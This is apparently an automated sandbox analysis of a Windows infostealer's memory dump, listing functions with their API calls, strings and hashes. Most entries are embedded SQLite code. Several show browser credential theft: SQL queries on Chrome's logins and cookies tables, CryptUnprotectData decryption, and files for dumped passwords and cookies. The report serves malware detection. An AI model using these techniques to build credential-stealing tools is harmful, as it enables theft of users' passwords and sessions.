Function 0041D4D0, Relevance: 30.5, APIs: 4, Strings: 13, Instructions: 758COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D5EA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D76C
__allrem.LIBCMT ref: 0041D777
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D983

Strings

-, xrefs: 0041D99A
hour, xrefs: 0041DAC6
month, xrefs: 0041D812, 0041DC98
localtime, xrefs: 0041D526
s, xrefs: 0041DA1B
unixepoch, xrefs: 0041D596, 0041D5E9
utc, xrefs: 0041D615
second, xrefs: 0041DC33
start of , xrefs: 0041D7D8
weekday , xrefs: 0041D6B2
minute, xrefs: 0041DBD2
day, xrefs: 0041D894, 0041DA61
year, xrefs: 0041D849, 0041DB23

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
String ID: -$day$hour$localtime$minute$month$s$second$start of $unixepoch$utc$weekday $year
API String ID: 632788072-1835271679
Opcode ID: 8d60213499b022585542f72055d1ba9871f0ea099d6611a7ded7369639bb8473
Instruction ID: 3561f70372f045a10f42f7234be95ab4bb6a2c99b6ebfcab4defaa27fcd556e6
Opcode Fuzzy Hash: 8d60213499b022585542f72055d1ba9871f0ea099d6611a7ded7369639bb8473
Instruction Fuzzy Hash: A5427BB1E087444BC7219F3498513E7BBD2AF92358F4846AFD88997342E72ED889C35D

Uniqueness

Uniqueness Score: -1.00%

Function 00460310, Relevance: 28.8, Strings: 22, Instructions: 1276COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 004605A5
sqlite_autoindex_%s_%d, xrefs: 004607CA
index, xrefs: 00460401, 004609D6
table %s may not be indexed, xrefs: 0046064F
virtual tables may not be indexed, xrefs: 00460687
views may not be indexed, xrefs: 0046066B
UNIQUE, xrefs: 00461162
conflicting ON CONFLICT clauses specified, xrefs: 00460FA2
there is already a table named %s, xrefs: 00460725
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);, xrefs: 004611B3
sqlite_master, xrefs: 00460819, 00460824, 00461199, 004611A8
name='%q' AND type='index', xrefs: 0046123E
cannot create a TEMP index on non-TEMP table "%s", xrefs: 0046049E
CREATE%s INDEX %.*s, xrefs: 00461170
altertab_, xrefs: 00460607
BINARY, xrefs: 00460D43, 00460D66, 00460D83, 00460E8B
index %s already exists, xrefs: 00460751
authorizer malfunction, xrefs: 0046085E
expressions prohibited in PRIMARY KEY and UNIQUE constraints, xrefs: 00460E58
not authorized, xrefs: 00460837
too many columns in %s, xrefs: 004609DB
sqlite_temp_master, xrefs: 004607ED, 0046118B

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$altertab_$authorizer malfunction$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$name='%q' AND type='index'$not authorized$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$views may not be indexed$virtual tables may not be indexed
API String ID: 0-3509607017
Opcode ID: 9db2d787b955abd640276a5b637e4bc9e9dc3ae270ddf95973ab412d3233ad4a
Instruction ID: a00e81c2cf1590052c7bc5fd01cae086ab566c2f8c2e19df03d04c544128e3d9
Opcode Fuzzy Hash: 9db2d787b955abd640276a5b637e4bc9e9dc3ae270ddf95973ab412d3233ad4a
Instruction Fuzzy Hash: 6DB2C1706043418FD724CF29C490B6BB7E1BF98304F19466EE8899B352E779EC45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408160, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 396fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25,?,?,?,?,00000000,7519FE60), ref: 00408185
ReadFile.KERNEL32(00000000,?,00000004,00000003,00000000,7519F9C0,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000), ref: 004081C4
ReadFile.KERNEL32(00000000,?,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25), ref: 0040820F
SetFilePointer.KERNEL32(00000000,0000000C,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25), ref: 0040824E
ReadFile.KERNEL32(00000000,00000001,00000004,00000003,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25), ref: 00408268
SetFilePointer.KERNEL32(00000000,00000038,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25), ref: 0040829A
ReadFile.KERNEL32(00000000,00000004,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00408F25), ref: 004082AE

Strings

global-salt, xrefs: 004084A3
password-check, xrefs: 0040854A

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Read$Pointer$Create
String ID: global-salt$password-check
API String ID: 974188869-3927197501
Opcode ID: fae5e48a4ae6dca0cdb883bb82ccee5d8775a437c7053f6692ebedc11f288372
Instruction ID: ee9f80ccf15e0fff85885323bc83b1dde4a11291b735e4e6c778e9fa611f1cfe
Opcode Fuzzy Hash: fae5e48a4ae6dca0cdb883bb82ccee5d8775a437c7053f6692ebedc11f288372
Instruction Fuzzy Hash: 1DD1A071904211AFE310DF14CD80B6BBBE9EF99314F44453EF989A7252DB38E941CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404400, Relevance: 21.5, APIs: 3, Strings: 9, Instructions: 465encryptionCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040440F
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004044E3
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040460F

Strings

1630345132, xrefs: 004047A0, 00404914
FALSE, xrefs: 004046D3, 0040478D, 00404847, 00404901
%Temp%\, xrefs: 004044A5
%s, xrefs: 004046AC, 004046C5, 004046D8, 004046EB, 00404704, 00404766, 0040477F, 00404792, 004047A5, 004047BE, 00404820, 00404839, 0040484C, 0040485F, 00404878, 004048DA, 004048F3, 00404906, 00404919, 00404932
1830365600, xrefs: 004046E6, 0040485A
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00404544
%s, xrefs: 00404713, 004047CD, 00404887, 00404941
TRUE, xrefs: 004046A7, 00404761, 0040481B, 004048D5
\files_\cookies\chromium.txt, xrefs: 004044B5

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$CryptDataUnprotect
String ID: %s$%s$%Temp%\$1630345132$1830365600$FALSE$SELECT host_key, path, name, encrypted_value FROM cookies$TRUE$\files_\cookies\chromium.txt
API String ID: 462701950-231775794
Opcode ID: aee757c3a29067d3c43946f2ce0b6601caac34a714627a057fb3fa0715f615cd
Instruction ID: 70fba60342db32720ecbf39c1f68bede48c0fe338317cac00ce333e9b39dbb25
Opcode Fuzzy Hash: aee757c3a29067d3c43946f2ce0b6601caac34a714627a057fb3fa0715f615cd
Instruction Fuzzy Hash: A5E104F5E0011077EB11A6659C43FAF362A5F5570CF24413FFA00B62E2E67E9A1186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040365A, Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 317encryptionCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040366F
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00403743
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038CB

Strings

Username: %s, xrefs: 00403A14, 00403A4E
Browser: Google Chrome, xrefs: 00403974
%Temp%\, xrefs: 00403705
Url: %s, xrefs: 00403A03
Password: %s, xrefs: 00403A23, 00403A5D
Soft: Google Chrome, xrefs: 0040397F
Site: %s, xrefs: 00403A3D
SELECT origin_url, username_value, password_value FROM logins, xrefs: 004037EC
\files_\passwords.txt, xrefs: 00403715

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$CryptDataUnprotect
String ID: %Temp%\$Browser: Google Chrome$Password: %s$SELECT origin_url, username_value, password_value FROM logins$Site: %s$Soft: Google Chrome$Url: %s$Username: %s$\files_\passwords.txt
API String ID: 462701950-3500573702
Opcode ID: 9c86c74318533ec6f20ee50684cf9f74edf63d473320003d673c3db6f024de4a
Instruction ID: 7260228c5d8af91d2e32b4141ec746d6a3d310698d341e139771d3457cd52e5e
Opcode Fuzzy Hash: 9c86c74318533ec6f20ee50684cf9f74edf63d473320003d673c3db6f024de4a
Instruction Fuzzy Hash: 57A135B1E001045BDB10AF64DC86FAE7B7AAF45309F14417EF401B72D2E77DAA018B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040410E, Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 478COMMON

Download Yara Rule

Strings

1630345132, xrefs: 004047A0, 00404914
FALSE, xrefs: 004046D3, 0040478D, 00404847, 00404901
\_Files\_Cookies\google_chrome_profile_3.txt, xrefs: 00404123
\files_\cookies\google_chrome_profile_3.txt, xrefs: 004041F7
%Temp%\, xrefs: 00404113, 004041E7
%s, xrefs: 004046AC, 004046C5, 004046D8, 004046EB, 00404704, 00404766, 0040477F, 00404792, 004047A5, 004047BE, 00404820, 00404839, 0040484C, 0040485F, 00404878, 004048DA, 004048F3, 00404906, 00404919, 00404932
1830365600, xrefs: 004046E6, 0040485A
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00404544
%s, xrefs: 00404713, 004047CD, 00404887, 00404941
TRUE, xrefs: 004046A7, 00404761, 0040481B, 004048D5

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$1630345132$1830365600$FALSE$SELECT host_key, path, name, encrypted_value FROM cookies$TRUE$\_Files\_Cookies\google_chrome_profile_3.txt$\files_\cookies\google_chrome_profile_3.txt
API String ID: 0-3542627223
Opcode ID: 86f8c36959145e127ccecd9ae694ed84a702c7b035be8982fab8fca16f5c8496
Instruction ID: 9348e27d5d5c7d39578af3633f80015bcc5c0b12c8d89f37e7e99e0880ea7c47
Opcode Fuzzy Hash: 86f8c36959145e127ccecd9ae694ed84a702c7b035be8982fab8fca16f5c8496
Instruction Fuzzy Hash: 07E115F5E0011077EB11A6619C43FAF362A5F5530CF24417FFA00B62E2E67D9A1186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040426D, Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 478COMMON

Download Yara Rule

Strings

1630345132, xrefs: 004047A0, 00404914
FALSE, xrefs: 004046D3, 0040478D, 00404847, 00404901
%Temp%\, xrefs: 00404272, 00404346
\files_\cookies\opera.txt, xrefs: 00404356
\_Files\_Cookies\opera.txt, xrefs: 00404282
%s, xrefs: 004046AC, 004046C5, 004046D8, 004046EB, 00404704, 00404766, 0040477F, 00404792, 004047A5, 004047BE, 00404820, 00404839, 0040484C, 0040485F, 00404878, 004048DA, 004048F3, 00404906, 00404919, 00404932
1830365600, xrefs: 004046E6, 0040485A
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00404544
%s, xrefs: 00404713, 004047CD, 00404887, 00404941
TRUE, xrefs: 004046A7, 00404761, 0040481B, 004048D5

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$1630345132$1830365600$FALSE$SELECT host_key, path, name, encrypted_value FROM cookies$TRUE$\_Files\_Cookies\opera.txt$\files_\cookies\opera.txt
API String ID: 0-1492467975
Opcode ID: 82c584140804b11d938bc92d1d78793b0961ffe148d3027209af28125e31b2c8
Instruction ID: 9692c288ba5ac6c60effc6d0cb9a326eb52b73e830bd0a0f33af776981393503
Opcode Fuzzy Hash: 82c584140804b11d938bc92d1d78793b0961ffe148d3027209af28125e31b2c8
Instruction Fuzzy Hash: D2E115F5E0011077EB11A6619C43FAF362A5F5570CF24417FF900B62E2E67D9A1186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0049C500, Relevance: 19.2, Strings: 15, Instructions: 496COMMON

Download Yara Rule

Strings

cache, xrefs: 0049C8CE
%s mode not allowed: %s, xrefs: 0049CAA3
PA, xrefs: 0049CA57
`KM, xrefs: 0049C8D6
pA, xrefs: 0049CA78, 0049CAF1
loca, xrefs: 0049C628
pKM, xrefs: 0049C8F4
no such %s mode: %s, xrefs: 0049C9B7
invalid uri authority: %.*s, xrefs: 0049C652
access, xrefs: 0049C90E
cach, xrefs: 0049C8AE
lhos, xrefs: 0049C631
file, xrefs: 0049C55A
mode, xrefs: 0049C8E8
no such vfs: %s, xrefs: 0049CA26

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s mode not allowed: %s$PA$`KM$access$cach$cache$file$invalid uri authority: %.*s$lhos$loca$mode$no such %s mode: %s$no such vfs: %s$pKM$pA
API String ID: 0-4040145025
Opcode ID: 924ba4501b8c2a2dc8fcdf50f8c29dd77a3f1e75de154009967ef83ae221dc9f
Instruction ID: f87f9b9652fb55ecbc7f5395234f85410aa733b82207fcc55ee4cdc9042dede9
Opcode Fuzzy Hash: 924ba4501b8c2a2dc8fcdf50f8c29dd77a3f1e75de154009967ef83ae221dc9f
Instruction Fuzzy Hash: 630224B19083428BDF21CF68C4D07677FA1AB95314F1846BFE8D547382D7399845C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00487520, Relevance: 14.5, Strings: 11, Instructions: 743COMMON

Download Yara Rule

Strings

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 004879E6
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 00487A0C
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 00487A4B
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 004879C9
ATTACH ':memory:' AS vacuum_db;, xrefs: 004876B4
BEGIN;, xrefs: 00487833
ATTACH '' AS vacuum_db;, xrefs: 004876C5, 004876CF
PRAGMA vacuum_db.synchronous=OFF, xrefs: 00487784
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 004879AE
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 00487A2E
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 00487A6D

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
API String ID: 0-52344843
Opcode ID: 6b340901f4b88a230f81c8c4b1554c2aeb40bb0145057c2ff221187d64e982b1
Instruction ID: 30557fcaffe864c2ce9599766671ebf52b481088dd3e37bcd2026fed269e45bf
Opcode Fuzzy Hash: 6b340901f4b88a230f81c8c4b1554c2aeb40bb0145057c2ff221187d64e982b1
Instruction Fuzzy Hash: 5352E770A083408FDB14EF25C86176F7BE2AF94318F24496EE8598B352EB38DD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044F230, Relevance: 12.9, Strings: 10, Instructions: 356COMMON

Download Yara Rule

Strings

GROUP, xrefs: 0044F59B
ORDER, xrefs: 0044F56B
UNION, xrefs: 0044F669
a GROUP BY clause is required before HAVING, xrefs: 0044F60C
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0044F628
EXCEPT, xrefs: 0044F677, 0044F683
INTERSECT, xrefs: 0044F670
all VALUES must have the same number of terms, xrefs: 0044F63A
SELECTs to the left and right of %s do not have the same number of result columns, xrefs: 0044F684
UNION ALL, xrefs: 0044F67E

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: EXCEPT$GROUP$INTERSECT$ORDER$SELECTs to the left and right of %s do not have the same number of result columns$UNION$UNION ALL$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause$all VALUES must have the same number of terms
API String ID: 0-2775031899
Opcode ID: 0312624d7e3ca28cb5cc9114af4b4b5eabad20a6a11bf3550211f5563907af14
Instruction ID: 46ab2fbaa07c9d7a3e22ffb8b70180c1a63a5e17d1e15b49eadde4f906133040
Opcode Fuzzy Hash: 0312624d7e3ca28cb5cc9114af4b4b5eabad20a6a11bf3550211f5563907af14
Instruction Fuzzy Hash: FFE16B746043019FE714CF29D440B5AB7E1FF98308F15866EE8849B761E779EC4ACB89

Uniqueness

Uniqueness Score: -1.00%

Function 0046C110, Relevance: 11.0, Strings: 7, Instructions: 2212COMMON

Download Yara Rule

Strings

%d values for %d columns, xrefs: 0046CC25
table %S has no column named %s, xrefs: 0046C581
rows inserted, xrefs: 0046DF31
authorizer malfunction, xrefs: 0046C29F
not authorized, xrefs: 0046C278
table %S has %d columns but %d values were supplied, xrefs: 0046CC06
, xrefs: 0046D605

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $%d values for %d columns$authorizer malfunction$not authorized$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
API String ID: 0-2302437764
Opcode ID: 366f0739524c82c05b7d09aa46108d5ae1200fa0d90cf32619a8663753eb7713
Instruction ID: 818d21531c8498abebb7d2b6b1f36fc1a66248d49d9b84f239ef147c70ea248b
Opcode Fuzzy Hash: 366f0739524c82c05b7d09aa46108d5ae1200fa0d90cf32619a8663753eb7713
Instruction Fuzzy Hash: AA236C70A04741CFC724DF19C090B6ABBE1FF88344F06855EE9858B762EB79E855CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0043A1D0, Relevance: 10.4, Strings: 8, Instructions: 386COMMON

Download Yara Rule

Strings

Main freelist: , xrefs: 0043A2E2
Failed to read ptrmap key=%d, xrefs: 0043A38B
d, xrefs: 0043A258
Pointer map page %d is referenced, xrefs: 0043A4E5
Page %d is never used, xrefs: 0043A482
PA, xrefs: 0043A530
pA, xrefs: 0043A550, 0043A56C
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d), xrefs: 0043A3BA

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Failed to read ptrmap key=%d$Main freelist: $Page %d is never used$Pointer map page %d is referenced$PA$d$pA
API String ID: 0-3181757601
Opcode ID: 119f80cc3f8f9b58e601f7a3c8325e478c7a16c8fb5eb0904afd9537f5cf307d
Instruction ID: e0d7774bb4a7333c72f2f9421356aa574270f8b4d9aedc7f0d796a83b7292cfe
Opcode Fuzzy Hash: 119f80cc3f8f9b58e601f7a3c8325e478c7a16c8fb5eb0904afd9537f5cf307d
Instruction Fuzzy Hash: 62E1CDB1A483009BCB14CF14C885B6BB7E1BF98304F18952FE8858B351D779E956CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0042B410, Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042B685
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042B79E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042B965

Strings

bda77dda9697c463c3d0704014d51627fceee328, xrefs: 0042B53C
cannot open file at line %d of [%.10s], xrefs: 0042B546

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: bda77dda9697c463c3d0704014d51627fceee328$cannot open file at line %d of [%.10s]
API String ID: 885266447-1773669540
Opcode ID: 12d5c7489f23abb1017b0b874ab68816b1de79afcac972ff072b1aee1f5b3cc2
Instruction ID: c0e1757809460ecdf9b7b018abeb5f65f8c823233dccc8fd78368213ff3b5b28
Opcode Fuzzy Hash: 12d5c7489f23abb1017b0b874ab68816b1de79afcac972ff072b1aee1f5b3cc2
Instruction Fuzzy Hash: 3B02C170700722AFE714DE69D880B66B3E4FF84314F84856EE9488B741D7B8E895CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0048F440, Relevance: 5.9, Strings: 4, Instructions: 905COMMON

Download Yara Rule

Strings

auto-index, xrefs: 0048F895
automatic index on %s(%s), xrefs: 0048F682
BINARY, xrefs: 0048F9D6, 0048FA3D, 0048FA83, 0048FAB1
B, xrefs: 0048F941

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: B$BINARY$auto-index$automatic index on %s(%s)
API String ID: 0-1851833074
Opcode ID: 4243bba0028013033a74d78de40d2ab6af881a88de187952c365129307c06c04
Instruction ID: aa453c00f9b70198d7003fcc32cd2076518d24d61f59c7dfc9682106973b7a36
Opcode Fuzzy Hash: 4243bba0028013033a74d78de40d2ab6af881a88de187952c365129307c06c04
Instruction Fuzzy Hash: 1A929174604345CFD724EF19C090B2AB7E1FF88304F15896EE9868B362EB39E949CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00485410, Relevance: 5.5, Strings: 3, Instructions: 1765COMMON

Download Yara Rule

Strings

ROWID, xrefs: 0048578F, 0048580B, 0048582F
no such column: %s, xrefs: 00485955
rows updated, xrefs: 00486C90

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ROWID$no such column: %s$rows updated
API String ID: 0-702578623
Opcode ID: 36a60d07316af550ea10ccfc629448713555763be32d2f8636c9f0a5385bf830
Instruction ID: 1246d6e1602c4b320ddc989a15bc3746989be56380f6040d37eeaf31f465683d
Opcode Fuzzy Hash: 36a60d07316af550ea10ccfc629448713555763be32d2f8636c9f0a5385bf830
Instruction Fuzzy Hash: 97035C70604741CFD724EF19C480B2BBBE1BF88344F16895EE9894B352EB79E855CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00446422, Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 00448B0A
gfff, xrefs: 0044632E
statement aborts at %d: [%s] %s, xrefs: 00446340
out of memory, xrefs: 004462F7

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: gfff$out of memory$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 0-3505805611
Opcode ID: 4ecf94db888eca2af8abe0a8ce0ca557747888c81158b548dd79b55cfda5cb2b
Instruction ID: aaf5a53684f17c327c5c29154e1f782d0e92553fc89cf5b693e53b699d000816
Opcode Fuzzy Hash: 4ecf94db888eca2af8abe0a8ce0ca557747888c81158b548dd79b55cfda5cb2b
Instruction Fuzzy Hash: 1AB199B5A083419FD710CF28C48066AB7E2BF89308F16492EF88997351E779EC55CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0040F259, Relevance: 4.7, APIs: 3, Instructions: 202fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0040F312
FindNextFileW.KERNEL32(00000000,?,?,?,?,?), ref: 0040F3DF
FindClose.KERNEL32(00000000), ref: 0040F3EE

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 55bea17b475fc24937828f155e38832855dbb1e954a914f22c3d471eaa609802
Instruction ID: 9160a91217c7e836fa945be4ae7f4d72bc7fe2fe4b9df564d14e5c27dbed8ed3
Opcode Fuzzy Hash: 55bea17b475fc24937828f155e38832855dbb1e954a914f22c3d471eaa609802
Instruction Fuzzy Hash: FB712A31A101058BDB18CF68CD85BAEB772FF96304F10867ED804E7A95D73DAA84C758

Uniqueness

Uniqueness Score: -1.00%

Function 004AF241, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004AF240,?,?,?,?,?,004A60CF), ref: 004AF263
TerminateProcess.KERNEL32(00000000,?,004AF240,?,?,?,?,?,004A60CF), ref: 004AF26A
ExitProcess.KERNEL32 ref: 004AF27C

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 934d9cb0df18aee0b7d4c798fa823615a1d09f5612d3ae61f3cf7a0b18102277
Instruction ID: cc106bebd775092a167e82f09ac106bd0b04bd96791b964fb90cd646073ab8d9
Opcode Fuzzy Hash: 934d9cb0df18aee0b7d4c798fa823615a1d09f5612d3ae61f3cf7a0b18102277
Instruction Fuzzy Hash: 4FE08C36000608AFCF516FA5DD08F9D3B69EB1A351B000879F804C6232CB3AED95CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0049E000, Relevance: 4.0, Strings: 3, Instructions: 200COMMON

Download Yara Rule

Strings

ct_init: dist != 256, xrefs: 0049E112
ct_init: length != 256, xrefs: 0049E0A2
ct_init: 256+dist != 512, xrefs: 0049E195

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ct_init: 256+dist != 512$ct_init: dist != 256$ct_init: length != 256
API String ID: 0-2704465662
Opcode ID: 35256614db8f2999cb55406807620d590dc1bc90cd83883e18b3bd7e0090afc0
Instruction ID: 215392c1c9ab64307359f176c1dbc36c2705582d4a709eaef17ac898039d1516
Opcode Fuzzy Hash: 35256614db8f2999cb55406807620d590dc1bc90cd83883e18b3bd7e0090afc0
Instruction Fuzzy Hash: 2571D0356007868BD724CF26C5847EBB7E1FF89304F094A7EC49A8B760E7B9A609C745

Uniqueness

Uniqueness Score: -1.00%

Function 004AE390, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecf4688ee079c100ce28047c5aef3b1f479666f179e7845ad1b62cf069729d7
Instruction ID: 8a17df2088bd58b66c28fc36254899ee58cdc3761d9e45a60913daaa3f3bd0e8
Opcode Fuzzy Hash: 3ecf4688ee079c100ce28047c5aef3b1f479666f179e7845ad1b62cf069729d7
